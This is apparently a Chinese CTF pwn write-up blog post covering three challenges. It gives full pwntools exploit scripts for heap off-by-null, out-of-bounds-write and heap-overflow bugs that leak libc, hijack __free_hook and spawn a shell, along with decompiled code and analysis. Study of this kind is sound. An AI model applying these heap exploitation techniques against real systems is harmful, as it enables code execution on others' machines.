libcname = file_name
debug = 0
if debug ==1 :
    p = process(file_name)
    elf = ELF(file_name)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('119.3.81.43',49155)
    libc = ELF('./libc-2.27.so')
    elf = ELF(file_name)

def Add(tname, size, des, score):
    p.sendlineafter('your choice>>', str(1))
    p.sendlineafter('topic name:', tname)
    p.sendlineafter('des size:', str(size))
    p.sendafter('topic des:', des)
    p.sendlineafter('topic score:', score)

def Delete(idx):
    p.sendlineafter('your choice>>', str(2))
    p.sendlineafter('index:', str(idx))

def Show(idx):
    p.sendlineafter('your choice>>', str(3))
    p.sendlineafter('index:', str(idx))

#gadgets = [0x4f365, 0x4f3c2, 0x10a45c]
gadgets = [0x45216, 0x4526a, 0xef6c4, 0xf0567]
def Pwn():
    p.sendlineafter('manager name:', 'CTFM')
    p.sendlineafter('input password:', '123456')

    Add(b'a1ex', 0xf8, b'a' * 0xf0, '0')
    Add(b'a1ex', 0x108, b'a'*0x100, '1')
    for i in range(8):
        Add('a1ex', 0xf8, b'a'*0xf8, str(i))

    for i in range(5):
        Delete(3+i)
    #gdb.attach(p, 'bp $rebase(0x158b)')
    Delete(0)
    Add(b'a1ex', 0xf8, b'a' * 0xf0+p64(0x110), '0')
    Delete(0)
    Add(b'a1ex', 0xf8, b'a' * 0xf0, '0')
    Delete(9)
    Delete(8)
    Delete(0)
    Add('a1ex', 0xf8, b'a' * 0xf8, '0')
    #gdb.attach(p, 'bp $rebase(0x158b)')
    #Delete(0)
    Delete(1)
    Add('a1ex', 0x108, b'a'*0x108, '0')  #off-by-null
    Delete(1)
    payload = 'a'*0x107
    Add('a1ex', 0x108, payload, '0')

    Delete(1)
    payload = 'a'*0x106
    Add('a1ex', 0x108, payload, '0')
    Delete(1)
    payload = 'a'*0x105
    Add('a1ex', 0x108, payload, '0')
    Delete(1)
    payload = 'a'*0x104
    Add('a1ex', 0x108, payload, '0')
    Delete(1)
    payload = 'a'*0x103
    Add('a1ex', 0x108, payload, '0')

    Delete(1)
    payload = b'a'*0x100+p64(0x210)
    Add('a1ex', 0x108, payload, '0')
    Delete(8)
    Delete(0)
    #gdb.attach(p, 'bp $rebase(0x158b)')
    Delete(2)
    #Delete(0)
    Add('a1ex', 0xf8, b'a' * 0xf8, '0')
    for i in range(7):
        Add('a1ex', 0xf8, '/bin/sh', '0')
    #gdb.attach(p, 'bp $rebase(0x158b')
    Show(1)
    p.recvuntil('topic des:')
    libc_addr = u64(p.recv(6).ljust(8, b'\x00'))
    libc_base = libc_addr-96-0x10-libc.sym['__malloc_hook']
    print("libc:",hex(libc_addr),hex(libc_base))
    free_hook = libc_base+libc.sym['__free_hook']
    system_addr = libc_base+libc.sym['system']
    malloc_hook = libc_base+libc.sym['__malloc_hook']
    puts_addr = libc_base+libc.sym['puts']
    gadget = gadgets[0]+libc_base
    # gdb.attach(p, 'bp $rebase(0x158b)')


    Add('a1ex', 0xf8, '/bin/sh', '0')
    Delete(0)
    #
    for i in range(6):
        Delete(2+i)
    Delete(9)
    Delete(8)
    Add('a1ex', 0x1f0, b'a' * 0xf8+p64(0x110), '0')    #8
    Add('a1ex', 0x108, b'a' * 0x100, '0')

    #Delete(8)
    Delete(2)
    Delete(1)
    Delete(0)
    Add('a1ex', 0x1f0, b'a' * 0x100+p64(free_hook), '0')
    #payload = 'a'*0x100+p64(free_hook)
    #gdb.attach(p, 'bp $rebase(0x158b)')
    Add('a1ex', 0x108, '/bin/sh', '0')
    Add('a1ex', 0x108, p64(system_addr), '233')


    Add('a1ex', 0xf8, '/bin/sh', '123')
    print("libc:",hex(libc_addr),hex(libc_base),hex(system_addr))
    Delete(3)

    p.interactive()

Pwn()

Pwnme

程序分析

  for ( num = 0; num < sec_num; ++num )
  {
    if ( v9_fa->dst_off > off )
    {
      off = v9_fa->dst_off;
      size = v9_fa->d_len;
    }
    if ( (unsigned int)(v9_fa->d_len + v9_fa->src_off) > LODWORD(chunk->size) )
      return 0LL;
    if ( num )
    {
      if ( v9_fa->dst_off < last_dst_off )
        return 0LL;
      if ( v9_fa->dst_off > last_dst_off && last_d_len + last_dst_off > v9_fa->dst_off )
        return 0LL;
    }
    else
    {
      off = v9_fa->dst_off;
      size = v9_fa->d_len;
    }
    last_dst_off = v9_fa->dst_off;
    last_d_len = v9_fa->d_len;
    v9_fa = (info_struct *)((char *)v9_fa + 0x28);
  }
  chunk->lchunk = (__int64)malloc(off + size);
  if ( !chunk->lchunk )
    return 0LL;
  chunk->lsize = size + off;
  chunk_f20 = (info_struct *)chunk->field_20;
  for ( numa = 0; numa < sec_num; ++numa )
  {
    dest = (void *)(chunk->lchunk + (unsigned int)chunk_f20->dst_off);// off
    memcpy(
      dest,
      (const void *)(chunk->data_chunk + (unsigned int)chunk_f20->src_off),// data
      (unsigned int)chunk_f20->d_len);
    enc((__int64)dest, chunk_f20->d_len, numa); // size
    chunk_f20 = (info_struct *)((char *)chunk_f20 + 0x28);
  }
  return 1LL;
}

程序逻辑比较复杂，也导致了出现了几个bug，当然最后能利用的只有一个。这里最后是利用src_off从 data_chunk中取出数据复制到 lchunk的 dst_off 偏移中。

虽然前面对 src_off \ dst_off和d_len都有检查，但是这里的检查存在两个问题。

首先如果 d_len前面为负数时，前面的检查是可以顺利通过的，而且由于 d_len成为负数，后续执行 memcpy时，将 d_len转换为了无符号整数，也就是这里会变为一个巨大的正整数，拷贝时会存在越界拷贝。但是这个漏洞不能利用，因为 d_len从负数转为正整数后，数值太大，将会导致拷贝错误，有可能会拷贝到一个不可读的内存。

后面，又找到一个漏洞。可以看到上面的检查，会对这三个变量进行一个循环检查。这里会检查当前的 dst_off不能小于上一次的 dst_off，并且检查 last_d_len+last_dst_off不能大于当前的 dst_off 以及 last_dst_off不能大于现在的 dst_off。这里当我们第二次输入 dst_off等于上一次的 dst_off时，就可以完全满足前面的检查。但是其却没有检查d_len+dst_off 有没有超过 lchunk的边界，如果超过边界，这里也是一个越界写的漏洞。

此外，在 edit函数中，也存在一个和第一个漏洞类似的负数溢出漏洞，但是都无法直接利用。

利用分析

利用越界写，修改紧邻的下一个堆块的 size，构造堆重叠。这里只有输出 name时才能泄漏地址，所以需要将伪造size的这个大块释放到 unsortedbin。然后将 unsortedbin libc重叠到一个以分配结构体的 name处，再通过输出name来获得 libc地址
然后，利用堆重叠，修改一个结构体中的 lchunk指针，再通过 edit函数实现任意地址写。最终劫持 free_hook

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'split', '-h'])

file_name = './loader'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(file_name)
    elf = ELF(file_name)
    libc = ELF(libcname)
else:
    p = remote()
    libc = ELF('./libc.so.6')

def loader(idx, name, size, data):
    p.sendlineafter('>> ', str(1))
    p.sendlineafter('index: ', str(idx))
    p.sendlineafter('name: ', name)
    p.sendlineafter('size: ', str(size))
    p.sendlineafter('data: ', data)

def View(idx):
    p.sendlineafter('>> ', str(2))
    p.sendlineafter('index: ', str(idx))

def Edit(idx, name, vaddr, size, data):
    p.sendlineafter('>> ', str(3))
    p.sendlineafter('index: ', str(idx))
    p.sendlineafter('name: ',name)
    p.sendlineafter('vaddr: ', str(vaddr))
    p.sendlineafter('size: ', str(size))
    p.sendlineafter('data: ', data)

def Run(idx):
    p.sendlineafter('>> ', str(4))
    p.sendlineafter('index: ', str(idx))

def Delete(idx):
    p.sendlineafter('>> ', str(5))
    p.sendlineafter('index: ', str(idx))

def data1(pd, d_off, d_len, s_off, d_len1, s_off1):
    payload = 'MZ'+'PE'+'\x00\x00'+'\x4c'+'\x01'+'\x02\x00' #0xa
    payload += pd
    payload = payload.ljust(0x3c, b'\x00')+'\x02'+3*b'\x00'   #data[0x3c]=2
    payload += (p64(0)+p64(0x21))*4
    payload = payload.ljust(0xf8, b'\x00') +'\x00\x00'  #data[0xfa]
    payload += p32(0)+p32(0)+p32(0)   #fa[0],fa[1],fa[2]
    payload += p32(d_off)+p32(d_len)+p32(s_off)   #fa[3]=dst_off,fa[4]=vsize,fa[5]=src_off
    payload += p32(0)*4
    payload += p32(0)+p32(0)+p32(0)
    payload += p32(d_off)+p32(d_len1)+p32(s_off1)
    return payload

def data(pd, d_off, d_len, s_off):
    payload = 'MZ'+'PE'+'\x00\x00'+'\x4c'+'\x01'+'\x01\x00' #0xa
    payload += pd
    payload = payload.ljust(0x3c, b'\x00')+'\x02'+3*b'\x00'   #data[0x3c]=2
    payload += (p64(0)+p64(0x21))*4
    payload = payload.ljust(0xf8, b'\x00') +'\x00\x00'  #data[0xfa]
    payload += p32(0)+p32(0)+p32(0)   #fa[0],fa[1],fa[2]
    payload += p32(d_off)+p32(d_len)+p32(s_off)   #fa[3]=dst_off,fa[4]=vsize,fa[5]=src_off
    return payload

def encrypt(payload, size, num):
    enc = ""
    for i in range(size):
        enc += p8((u8(payload[i])-(i+8))&0xff^num^0x39)
    print(hex(u64(enc)))
    return enc

def encrypt1(payload, size, num):
    enc = ""
    for i in range(size):
        enc += p8((u8(payload[i])-(i))&0xff^num^0x39)
    return enc

def Pwn():
    gdb.attach(p, 'bp $rebase(0x1830)')
    payload = data('0000', 0x60, 0x0, 0x20)
    payload = payload.ljust(0x600, b'\x00')
    loader(0, '0'*0xa, 0x600, payload)

    payload = data('1'*6+p64(0x20)+p64(0x21)+p64(0x20)+p64(0x21), 0x60, 0x0, 0x20)
    payload = payload.ljust(0x200, b'\x00')
    loader(1, '1'*0xa, 0x200, payload)

    print("prepare to oob")
    Delete(0)

    #use chunk0 to oob
    payload = data('0'*6+p64(0)+p64(0x81), 0x30, 0x20, 0x10)
    payload = payload.ljust(0x1f0, b'\x00')
    loader(0, '0'*0xa, 0x1f0, payload)

    payload = data('2'*6+p64(0)+p64(0x81), 0x30, 0x20, 0x10)
    payload = payload.ljust(0x1f0, b'\x00')
    loader(2, '2'*0xa, 0x1f0, payload)

    payload = data('3'*6+p64(0)+p64(0x81), 0x30, 0x20, 0x10)
    payload = payload.ljust(0x1f0, b'\x00')
    loader(3, '0'*0xa, 0x1f0, payload)

    print('use to oob chunk 0')
    #use to oob

    Delete(0)

    #oob
    fake_size = encrypt(p64(0x421), 0x8, 1)
    payload = data1('0000', 0x50, 0x0, 0x20, 0x10, 0x150)
    payload = payload.ljust(0x158, b'\x00')
    payload += fake_size+'1'*0x10       #p64(0x48474645444342c0)
    payload = payload.ljust(0x1f0, b'\x00')
    loader(0, '0'*0xa, 0x1f0, payload)

    print("leak addr")
    Delete(2)

    payload = data('3'*6+p64(0)+p64(0x81), 0x30, 0x20, 0x10)
    payload = payload.ljust(0x1e0, b'\x00')
    loader(2, '0'*0xa, 0x1e0, payload)

    payload = data('3'*6+p64(0)+p64(0x81), 0x30, 0x20, 0x10)
    payload = payload.ljust(0x1f0, b'\x00')
    loader(4, '0'*0xa, 0x1f0, payload)

    View(3)
    libc_addr = u64(p.recvuntil('\n', drop=True)[-6:].ljust(8, b'\x00'))
    libc_base = libc_addr - 88 - libc.sym['__malloc_hook']-0x10
    print('libc_addr:',hex(libc_addr),hex(libc_base))
    free_hook = libc_base + libc.sym['__free_hook']
    system_addr = libc_base + libc.sym['system']

    print("hijack cf")

    Edit(4, '1111', 0x40, 8, p64(free_hook))
    Edit(3, '3333', 0x0, 8, p64(system_addr))
    Edit(4, '4444', 0, 8, '/bin/sh\x00')
    #Edit(3, '3333', 0x0, 8, '/bin/sh\x00')

    Delete(4)

    p.interactive()

Pwn()

Jerry

听搞浏览器的Ver哥大概讲了一下JS的原理和利用手法，利用很简单。但是找洞还是没搞懂是怎么找到的。

2021-津门杯线下

pad

tiktok

程序分析

程序挺复杂的，但是其实也能大概猜到，应该会留一个比较好利用的漏洞，只是比较难找到而已。

_BYTE *__fastcall change_info(phone_c *a1)
{
  signed int v1; // eax
  signed int v2; // eax
  signed int v3; // eax
  signed int v4; // ST1C_4

  printf("userInfo data: ");
  v1 = strlen((const char *)a1->name);
  change_str(&a1->name, v1);
  change_int((unsigned int *)&a1->sex);
  v2 = strlen((const char *)a1->introduce);
  change_str(&a1->introduce, v2);
  v3 = change_int(0LL);
  get_input(0, (__int64)a1->phones, v3);
  v4 = change_int(0LL);
  get_input(0, (__int64)a1->pwd, v4);
  return change_str(&a1->email, a1->email_size);
}

在 load_file中的 change_info函数中，可以看到对 phones和 pwd的写入长度都是由我们指定，而且并没有对这些长度进行检查。这就导致我们可以直接实现堆溢出。

而这里为了能够进入 load_file功能，需要创建其他用户对要修改的用户进行点赞watch。

利用分析

先利用 show_info泄漏出 heap地址，然后利用堆溢出修改后面一个结构体的管理指针，来劫持 free_hook

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=['tmux', 'split', '-h']

filename = './tiktok'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF(libcname)
else:
     p = remote('10.4.8.211', 5009)
     elf = ELF(filename)
     libc = ELF(libcname)

def register(phone, pwd, name, intro, len1, email):
    p.sendlineafter('choice>> ', str(2))
    p.sendlineafter('phone: ', phone)
    p.sendlineafter('passwd: ', pwd)
    p.sendafter('name: ', name)
    p.sendlineafter('introduceion: ', intro)
    p.sendlineafter('sex(man:1, woman:0): ', str(1))
    p.sendlineafter('email len: ', str(len1))
    p.sendlineafter('email: ', email)

def login(phone, pwd):
    p.sendlineafter('choice>> ', str(1))
    p.sendlineafter('phone: ', phone)
    p.sendlineafter('passwd: ', pwd)

def publish(size, data):
    p.sendlineafter('choice>> ', str(1))
    p.sendlineafter('video_size: ', str(size))
    p.sendafter('video_data: ', data)
    p.sendlineafter('(y:1, n:0): ', 'y')

def delt(idx):
    p.sendlineafter('choice>> ', str(4))
    p.sendlineafter('index: ', str(idx))

def ch_info(n_len, name, i_len, intro, ph_len, ph, pwd_len, pwd, m_len, mail):
    p.sendlineafter('choice>> ', str(8))
    p.recvuntil('userInfo data: ')
    p.send(p32(n_len))
    p.send(name)
    p.send(p32(0))
    p.send(p32(i_len))
    p.send(intro)
    p.send(p32(ph_len))
    p.send(ph)
    p.send(p32(pwd_len))
    p.send(pwd)
    p.send(p32(m_len))
    p.send(mail)

def logout():
    p.sendlineafter('choice>> ', str(0x64))

def watch():
    p.sendlineafter('choice>> ', str(2))
    p.sendlineafter('offset: ', '4')
    p.sendlineafter('size: ', '2')

def star():
    p.sendlineafter('100. back\n', str(3))
def back():
    p.sendlineafter('100. back\n', str(100))

def s_info(ch):
    p.sendlineafter('choice>> ', str(6))
    p.sendlineafter('choice>> ',str(ch))

def e_info(ch, len1, name):
    p.sendlineafter('choice>> ', str(5))
    p.sendlineafter('choice>> ',str(ch))
    p.sendlineafter('email len: ', str(len1))
    p.sendlineafter('email: ', name)

def e_info1(ch, name):
    p.sendlineafter('choice>> ', str(5))
    p.sendlineafter('choice>> ',str(ch))
    p.sendlineafter('introduceion: ', name)

def delcount():
    p.sendlineafter('choice>> ', str(0xa))

def pwn():
    for i in range(8):
        if i == 5:
            continue
        register(str(i)*4, '1', '1'*0x20, '1'*0x30, 0x20, '1'*0x1f)
    register('5'* 4, '1', '1'*0x20, '1'*8, 0x70, '1'*0x6f)

    gdb.attach(p, 'bp 0x401c38')
    login('5555', '1')
    publish(0x450, 'z'*0x450)
    publish(0x100, 'z'*0x100)
    logout()

    login('1111', '1')
    publish(0x20, 'h'*0x20)
    logout()

    for i in range(7):
        if i == 4:
            continue
        login(str(1+i)*4, '1')
        watch()
        for i in range(5):
            star()
        back()
        logout()
    login('1111', '1')
    delt(1)
    logout()

    login('5555', '1')
    ch_info(0x8,'a'*8, 0x30, '1'*0x30, 0x20, '1'*0x20, 0x20, '5'*0x20, 8, p64(0x604f50))

    s_info(2)
    p.recvuntil('5'*0x20)
    heap_addr = u32(p.recvuntil('\n', drop=True).ljust(4, b'\x00'))
    print('heap_addr:',hex(heap_addr))

    ch_info(0x8,'a'*8, 0x30, '1'*0x30, 0x20, '1'*0x20, 0x28, '5'*0x20+p64(heap_addr-0xe0), 0x18, p64(heap_addr-0xe0+0x38)+p64(0)+p64(heap_addr+0x80))

    s_info(4)

    libc_addr = u64(p.recvuntil('\n', drop=True)[-6:].ljust(8, b'\x00'))
    libc_base = libc_addr-0x10-96-libc.sym['__malloc_hook']
    print('libc_addr:',hex(libc_addr),hex(libc_base))

    free_hook = libc_base+libc.sym['__free_hook']
    system_addr = libc_base+libc.sym['system']

    e_info('5', 0x60, '/bin/sh\x00'+'a'*0x8+p64(heap_addr-0xe0)+'a'*0x40+p64(free_hook))
    e_info('5', 0x8, p64(system_addr))
    e_info1('3', '/bin/shaaaaa')

    p.interactive()

pwn()

本文作者： A1ex
本文链接： http://yoursite.com/2021/05/30/2021-4月题解/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！